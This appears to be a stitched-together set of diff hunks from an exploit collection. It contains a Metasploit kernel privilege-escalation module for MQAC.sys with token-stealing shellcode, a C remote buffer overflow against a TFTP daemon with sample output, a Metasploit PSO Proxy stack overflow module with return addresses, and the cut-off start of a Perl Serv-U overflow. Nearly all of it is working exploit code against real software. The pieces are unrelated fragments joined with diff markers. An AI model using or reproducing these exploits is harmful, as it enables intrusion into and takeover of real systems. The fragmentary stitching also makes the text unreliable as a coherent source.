\'Description\' => %q{
|
||||
'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',
|
||||
'Description' => %q{
|
||||
A vulnerability within the MQAC.sys module allows an attacker to
|
||||
overwrite an arbitrary location in kernel memory.
|
||||
|
||||
This module will elevate itself to SYSTEM, then inject the payload
|
||||
into another SYSTEM process.
|
||||
},
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Author\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
\'Matt Bergin\', # original exploit and all the hard work
|
||||
\'Spencer McIntyre\' # MSF module
|
||||
'Matt Bergin', # original exploit and all the hard work
|
||||
'Spencer McIntyre' # MSF module
|
||||
],
|
||||
\'Arch\' => [ ARCH_X86 ],
|
||||
\'Platform\' => [ \'win\' ],
|
||||
\'SessionTypes\' => [ \'meterpreter\' ],
|
||||
\'DefaultOptions\' =>
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
\'EXITFUNC\' => \'thread\',
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
\'Targets\' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ \'Windows XP SP3\',
|
||||
[ 'Windows XP SP3',
|
||||
{
|
||||
\'_KPROCESS\' => \"\\x44\",
|
||||
\'_TOKEN\' => \"\\xc8\",
|
||||
\'_UPID\' => \"\\x84\",
|
||||
\'_APLINKS\' => \"\\x88\"
|
||||
'_KPROCESS' => "\x44",
|
||||
'_TOKEN' => "\xc8",
|
||||
'_UPID' => "\x84",
|
||||
'_APLINKS' => "\x88"
|
||||
}
|
||||
],
|
||||
],
|
||||
\'References\' =>
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2014-4971\' ],
|
||||
[ \'EDB\', \'34112\' ],
|
||||
[ \'URL\', \'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\' ]
|
||||
[ 'CVE', '2014-4971' ],
|
||||
[ 'EDB', '34112' ],
|
||||
[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
|
||||
],
|
||||
\'DisclosureDate\'=> \'Jul 22 2014\',
|
||||
\'DefaultTarget\' => 0
|
||||
'DisclosureDate'=> 'Jul 22 2014',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
end
|
||||
|
||||
def find_sys_base(drvname)
|
||||
session.railgun.add_dll(\'psapi\') if not session.railgun.dlls.keys.include?(\'psapi\')
|
||||
session.railgun.add_function(\'psapi\', \'EnumDeviceDrivers\', \'BOOL\', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]])
|
||||
session.railgun.add_function(\'psapi\', \'GetDeviceDriverBaseNameA\', \'DWORD\', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]])
|
||||
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
|
||||
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
|
||||
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
|
||||
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
|
||||
addresses = results[\'lpImageBase\'][0..results[\'lpcbNeeded\'] - 1].unpack(\"L*\")
|
||||
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
|
||||
|
||||
addresses.each do |address|
|
||||
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
|
||||
current_drvname = results[\'lpBaseName\'][0..results[\'return\'] - 1]
|
||||
current_drvname = results['lpBaseName'][0..results['return'] - 1]
|
||||
if drvname == nil
|
||||
if current_drvname.downcase.include?(\'krnl\')
|
||||
if current_drvname.downcase.include?('krnl')
|
||||
return [address, current_drvname]
|
||||
end
|
||||
elsif drvname == results[\'lpBaseName\'][0..results[\'return\'] - 1]
|
||||
elsif drvname == results['lpBaseName'][0..results['return'] - 1]
|
||||
return [address, current_drvname]
|
||||
end
|
||||
end
|
||||
|
@ -80,29 +80,29 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# Function borrowed from smart_hashdump
|
||||
def get_system_proc
|
||||
# Make sure you got the correct SYSTEM Account Name no matter the OS Language
|
||||
local_sys = resolve_sid(\"S-1-5-18\")
|
||||
system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"
|
||||
local_sys = resolve_sid("S-1-5-18")
|
||||
system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
|
||||
|
||||
this_pid = session.sys.process.getpid
|
||||
# Processes that can Blue Screen a host if migrated in to
|
||||
dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]
|
||||
dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
|
||||
session.sys.process.processes.each do |p|
|
||||
# Check we are not migrating to a process that can BSOD the host
|
||||
next if dangerous_processes.include?(p[\"name\"])
|
||||
next if p[\"pid\"] == this_pid
|
||||
next if p[\"pid\"] == 4
|
||||
next if p[\"user\"] != system_account_name
|
||||
next if dangerous_processes.include?(p["name"])
|
||||
next if p["pid"] == this_pid
|
||||
next if p["pid"] == 4
|
||||
next if p["user"] != system_account_name
|
||||
return p
|
||||
end
|
||||
end
|
||||
|
||||
def open_device
|
||||
handle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil)
|
||||
if handle[\'return\'] == 0
|
||||
print_error(\'Failed to open the \\\\\\\\.\\\\MQAC device\')
|
||||
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
|
||||
if handle['return'] == 0
|
||||
print_error('Failed to open the \\\\.\\MQAC device')
|
||||
return nil
|
||||
end
|
||||
handle = handle[\'return\']
|
||||
handle = handle['return']
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
|
||||
os = sysinfo[\"OS\"]
|
||||
os = sysinfo["OS"]
|
||||
case os
|
||||
when /windows xp.*service pack 3/i
|
||||
return Exploit::CheckCode::Appears
|
||||
|
@ -124,79 +124,79 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
if sysinfo[\"Architecture\"] =~ /wow64/i
|
||||
print_error(\"Running against WOW64 is not supported\")
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
print_error("Running against WOW64 is not supported")
|
||||
return
|
||||
elsif sysinfo[\"Architecture\"] =~ /x64/
|
||||
print_error(\"Running against 64-bit systems is not supported\")
|
||||
elsif sysinfo["Architecture"] =~ /x64/
|
||||
print_error("Running against 64-bit systems is not supported")
|
||||
return
|
||||
end
|
||||
|
||||
if is_system?
|
||||
print_error(\"This meterpreter session is already running as SYSTEM\")
|
||||
print_error("This meterpreter session is already running as SYSTEM")
|
||||
return
|
||||
end
|
||||
|
||||
kernel_info = find_sys_base(nil)
|
||||
base_addr = 0xffff
|
||||
print_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\")
|
||||
print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
|
||||
|
||||
handle = open_device
|
||||
return if handle.nil?
|
||||
|
||||
this_proc = session.sys.process.open
|
||||
unless this_proc.memory.writable?(base_addr)
|
||||
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\")
|
||||
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
|
||||
end
|
||||
unless this_proc.memory.writable?(base_addr)
|
||||
print_error(\'Failed to properly allocate memory\')
|
||||
print_error('Failed to properly allocate memory')
|
||||
this_proc.close
|
||||
return
|
||||
end
|
||||
|
||||
hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
|
||||
hKernel = hKernel[\'return\']
|
||||
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\")
|
||||
halDispatchTable = halDispatchTable[\'return\']
|
||||
hKernel = hKernel['return']
|
||||
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
|
||||
halDispatchTable = halDispatchTable['return']
|
||||
halDispatchTable -= hKernel
|
||||
halDispatchTable += kernel_info[0]
|
||||
print_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\")
|
||||
print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
|
||||
|
||||
tokenstealing = \"\\x52\" # push edx # Save edx on the stack
|
||||
tokenstealing << \"\\x53\" # push ebx # Save ebx on the stack
|
||||
tokenstealing << \"\\x33\\xc0\" # xor eax, eax # eax = 0
|
||||
tokenstealing << \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
|
||||
tokenstealing << \"\\x8b\\x40\" + target[\'_KPROCESS\'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
|
||||
tokenstealing << \"\\x8b\\xc8\" # mov ecx, eax
|
||||
tokenstealing << \"\\x8b\\x98\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
|
||||
tokenstealing << \"\\x8b\\x80\" + target[\'_APLINKS\'] + \"\\x00\\x00\\x00\" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
|
||||
tokenstealing << \"\\x81\\xe8\" + target[\'_APLINKS\'] + \"\\x00\\x00\\x00\" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
|
||||
tokenstealing << \"\\x81\\xb8\" + target[\'_UPID\'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
|
||||
tokenstealing << \"\\x75\\xe8\" # jne 0000101e ======================
|
||||
tokenstealing << \"\\x8b\\x90\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
|
||||
tokenstealing << \"\\x8b\\xc1\" # mov eax, ecx # Retrieves KPROCESS stored on ECX
|
||||
tokenstealing << \"\\x89\\x90\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
|
||||
tokenstealing << \"\\x5b\" # pop ebx # Restores ebx
|
||||
tokenstealing << \"\\x5a\" # pop edx # Restores edx
|
||||
tokenstealing << \"\\xc2\\x10\" # ret 10h # Away from the kernel!
|
||||
tokenstealing = "\x52" # push edx # Save edx on the stack
|
||||
tokenstealing << "\x53" # push ebx # Save ebx on the stack
|
||||
tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0
|
||||
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
|
||||
tokenstealing << "\x8b\x40" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
|
||||
tokenstealing << "\x8b\xc8" # mov ecx, eax
|
||||
tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
|
||||
tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
|
||||
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
|
||||
tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
|
||||
tokenstealing << "\x75\xe8" # jne 0000101e ======================
|
||||
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
|
||||
tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
|
||||
tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
|
||||
tokenstealing << "\x5b" # pop ebx # Restores ebx
|
||||
tokenstealing << "\x5a" # pop edx # Restores edx
|
||||
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
|
||||
|
||||
shellcode = make_nops(0x200) + tokenstealing
|
||||
this_proc.memory.write(0x1, shellcode)
|
||||
this_proc.close
|
||||
|
||||
print_status(\"Triggering vulnerable IOCTL\")
|
||||
print_status("Triggering vulnerable IOCTL")
|
||||
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
|
||||
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
|
||||
|
||||
unless is_system?
|
||||
print_error(\"Exploit failed\")
|
||||
print_error("Exploit failed")
|
||||
return
|
||||
end
|
||||
|
||||
proc = get_system_proc
|
||||
print_status(\"Injecting the payload into SYSTEM process: #{proc[\'name\']}\")
|
||||
unless execute_shellcode(payload.encoded, nil, proc[\'pid\'])
|
||||
fail_with(Failure::Unknown, \"Error while executing the payload\")
|
||||
print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
|
||||
unless execute_shellcode(payload.encoded, nil, proc['pid'])
|
||||
fail_with(Failure::Unknown, "Error while executing the payload")
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -14,43 +14,43 @@
|
|||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
|
||||
#pragma comment(lib, \"ws2_32.lib\")
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
|
||||
char Buffer_Overflow[] =
|
||||
\"\\x00\\x02\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" // A = 41. 300 bytes...
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\0\"
|
||||
\"netascii\"
|
||||
\"\\0\";
|
||||
"\x00\x02"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes...
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\0"
|
||||
"netascii"
|
||||
"\0";
|
||||
|
||||
void main(int argc, char *argv[])
|
||||
{
|
||||
|
@ -62,52 +62,52 @@ SOCKET mysocket;
|
|||
int destPORT = 69;
|
||||
|
||||
if (argc < 2){
|
||||
printf(\"\\nVulnerability: Remote Buffer Overflow Exploit\\n\");
|
||||
printf(\"Impact: Remote Denial of Service Attack\\n\");
|
||||
printf(\"Vulnerable Application: TFTP Daemon Version 1.9\\n\");
|
||||
printf(\"\\nAuthor: Socket_0x03\\n\");
|
||||
printf(\"Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]\\n\");
|
||||
printf(\"Website: www.teraexe.com\\n\");
|
||||
printf(\"\\nUsage: exploit + IP Address\\n\");
|
||||
printf(\"Example: exploit 192.168.1.100\\n\");
|
||||
printf("\nVulnerability: Remote Buffer Overflow Exploit\n");
|
||||
printf("Impact: Remote Denial of Service Attack\n");
|
||||
printf("Vulnerable Application: TFTP Daemon Version 1.9\n");
|
||||
printf("\nAuthor: Socket_0x03\n");
|
||||
printf("Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]\n");
|
||||
printf("Website: www.teraexe.com\n");
|
||||
printf("\nUsage: exploit + IP Address\n");
|
||||
printf("Example: exploit 192.168.1.100\n");
|
||||
return;
|
||||
}
|
||||
|
||||
wVersionRequested = MAKEWORD(1, 1);
|
||||
if (WSAStartup(wVersionRequested, &wsaData) < 0) {
|
||||
printf(\"No winsock suitable version found!\");
|
||||
printf("No winsock suitable version found!");
|
||||
return;
|
||||
}
|
||||
mysocket = socket(AF_INET, SOCK_DGRAM , 0);
|
||||
if(mysocket==INVALID_SOCKET){
|
||||
printf(\"Error: Cannot create a socket.\\n\");
|
||||
printf("Error: Cannot create a socket.\n");
|
||||
exit(1);
|
||||
}
|
||||
printf(\"Resolving IP Address.\\n\");
|
||||
printf("Resolving IP Address.\n");
|
||||
if ((pTarget = gethostbyname(argv[2])) == NULL){
|
||||
printf(\"Error: Resolve of %s failed.\\n\", argv[1]);
|
||||
printf("Error: Resolve of %s failed.\n", argv[1]);
|
||||
exit(1);
|
||||
}
|
||||
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
|
||||
sock.sin_family = AF_INET;
|
||||
sock.sin_port = htons(destPORT);
|
||||
|
||||
printf(\"Connecting to Daemon 1.9\\n\");
|
||||
printf("Connecting to Daemon 1.9\n");
|
||||
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
|
||||
printf(\"Error: Could not connect to TFTP Daemon\\n\");
|
||||
printf("Error: Could not connect to TFTP Daemon\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf(\"Connection Completed.\\n\");
|
||||
printf("Connection Completed.\n");
|
||||
Sleep(10);
|
||||
|
||||
printf(\"Sending packet.\\n\");
|
||||
printf("Sending packet.\n");
|
||||
if (send(mysocket,Buffer_Overflow, sizeof(Buffer_Overflow)+1, 0) == -1){
|
||||
printf(\"Error sending packet.\\n\");
|
||||
printf("Error sending packet.\n");
|
||||
closesocket(mysocket);
|
||||
exit(1);
|
||||
}
|
||||
printf(\"Remote Buffer Overflow Completed.\\n\");
|
||||
printf("Remote Buffer Overflow Completed.\n");
|
||||
|
||||
closesocket(mysocket);
|
||||
WSACleanup();
|
||||
|
@ -117,7 +117,7 @@ WSACleanup();
|
|||
Microsoft Windows XP [Versión 5.1.2600]
|
||||
(C) Copyright 1985-2001 Microsoft Corp.
|
||||
|
||||
C:\\>exploit
|
||||
C:\>exploit
|
||||
|
||||
Vulnerability: Remote Buffer Overflow Exploit
|
||||
Impact: Remote Denial of Service Attack
|
||||
|
@ -130,12 +130,12 @@ Website: www.teraexe.com
|
|||
Usage: exploit + IP Address
|
||||
Example: exploit 192.168.1.100
|
||||
|
||||
C:\\>exploit 192.168.1.101
|
||||
C:\>exploit 192.168.1.101
|
||||
Resolving IP Address.
|
||||
Connecting to Daemon 1.9
|
||||
Connection Completed.
|
||||
Sending packet.
|
||||
Remote Buffer Overflow Completed.
|
||||
|
||||
C:\\>
|
||||
C:\>
|
||||
*/
|
|
@ -18,43 +18,43 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'PSO Proxy v0.91 Stack Buffer Overflow\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'PSO Proxy v0.91 Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
|
||||
If a client sends an excessively long string the stack is overwritten.
|
||||
},
|
||||
\'Author\' => \'Patrick Webster <patrick@aushack.com>\',
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 9262 $\',
|
||||
\'References\' =>
|
||||
'Author' => 'Patrick Webster <patrick@aushack.com>',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9262 $',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2004-0313\' ],
|
||||
[ \'OSVDB\', \'4028\' ],
|
||||
[ \'URL\', \'http://www.milw0rm.com/exploits/156\' ],
|
||||
[ \'BID\', \'9706\' ],
|
||||
[ 'CVE', '2004-0313' ],
|
||||
[ 'OSVDB', '4028' ],
|
||||
[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
|
||||
[ 'BID', '9706' ],
|
||||
],
|
||||
\'DefaultOptions\' =>
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
\'EXITFUNC\' => \'thread\',
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
\'Payload\' =>
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 370,
|
||||
\'BadChars\' => \"\\x00\\x0a\\x0d\\x20\",
|
||||
\'StackAdjustment\' => -3500,
|
||||
'Space' => 370,
|
||||
'BadChars' => "\x00\x0a\x0d\x20",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
\'Platform\' => \'win\',
|
||||
\'Targets\' =>
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
|
||||
[ \'Windows 2000 Pro SP0-4 English\', { \'Ret\' => 0x75023112 } ], # call ecx ws2help.dll
|
||||
[ \'Windows 2000 Pro SP0-4 French\', { \'Ret\' => 0x74fa3112 } ], # call ecx ws2help.dll
|
||||
[ \'Windows 2000 Pro SP0-4 Italian\', { \'Ret\' => 0x74fd3112 } ], # call ecx ws2help.dll
|
||||
[ \'Windows XP Pro SP0/1 English\', { \'Ret\' => 0x71aa396d } ], # call ecx ws2help.dll
|
||||
[ \'Windows XP Pro SP2 English\', { \'Ret\' => 0x71aa3de3 } ], # call ecx ws2help.dll
|
||||
[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
|
||||
[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
|
||||
[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
|
||||
[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
|
||||
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'DisclosureDate\' => \'Feb 20 2004\'
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Feb 20 2004'
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
@ -65,9 +65,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
connect
|
||||
sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")
|
||||
sock.put("GET / HTTP/1.0\r\n\r\n")
|
||||
banner = sock.get(-1,3)
|
||||
if (banner =~ /PSO Proxy 0\\.9/)
|
||||
if (banner =~ /PSO Proxy 0\.9/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
|
@ -77,9 +77,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
connect
|
||||
|
||||
exploit = rand_text_alphanumeric(1024, payload_badchars)
|
||||
exploit += [target[\'Ret\']].pack(\'V\') + payload.encoded
|
||||
exploit += [target['Ret']].pack('V') + payload.encoded
|
||||
|
||||
sock.put(exploit + \"\\r\\n\\r\\n\")
|
||||
sock.put(exploit + "\r\n\r\n")
|
||||
|
||||
disconnect
|
||||
handler
|
||||
|
|
|
@ -11,25 +11,25 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
|
|||
## I do not take responsibility for the use of this code
|
||||
|
||||
use IO::Socket qw(:DEFAULT :crlf);
|
||||
print \"Serv-u MDTM Buffer overflow - by saintjmf\\n\";
|
||||
print "Serv-u MDTM Buffer overflow - by saintjmf\n";
|
||||
|
||||
## Get Host port unsername and password
|
||||
|
||||
my $host = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password>\\n\";
|
||||
my $port = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password> \\n\";
|
||||
my $host = shift || die print "\nUsage: <program> <Host> <port> <username> <password>\n";
|
||||
my $port = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
|
||||
|
||||
$username = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password> \\n\";
|
||||
